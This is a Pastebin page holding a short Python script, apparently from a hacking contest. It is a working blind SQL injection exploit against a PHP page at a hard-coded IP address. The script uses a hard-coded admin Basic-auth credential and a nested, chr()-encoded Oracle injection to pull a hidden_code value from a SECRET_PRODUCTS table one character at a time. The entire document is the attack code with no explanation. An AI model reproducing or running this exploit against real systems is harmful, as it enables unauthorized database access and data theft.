daily pastebin goal
80%
SHARE
TWEET

Untitled

a guest Jan 27th, 2014 156 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. import requests
  3. import re
  4. import sys
  5.  
  6. def enc(text):
  7.         return '||'.join(map(lambda x : 'chr(%s)' % ord(x), list(text)))
  8.  
  9. def pwn(cmd):
  10.         url = "http://195.133.87.173/address_shops.php?debug=1&city=xxx''%s') as branch from dual -- " % cmd
  11.         r = requests.get(url, headers = {'Authorization' : 'Basic YWRtaW46UEBzc3cwcmQ5ODIzXyNAIWhocXF5aQ=='}).content
  12.         return r
  13.  
  14. for i in xrange(1, 100):
  15.         html = pwn(" and 1=0 union all select cast((select PHD_IV_OWNER2.shop_private_pkg.GET_PRODUCT_QUANTITY(%s) from dual) as varchar(1000)) from dual -- " % enc("x' union all select ascii(substr(hidden_code,%s,1)) from SECRET_PRODUCTS where hidden_code is not null -- " % i))
  16.         m = re.search('<tr>(\d+)</tr>', html, re.DOTALL)
  17.         if m:
  18.                 sys.stdout.write(chr(int(m.group(1))))
  19.         else:
  20.                 break
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top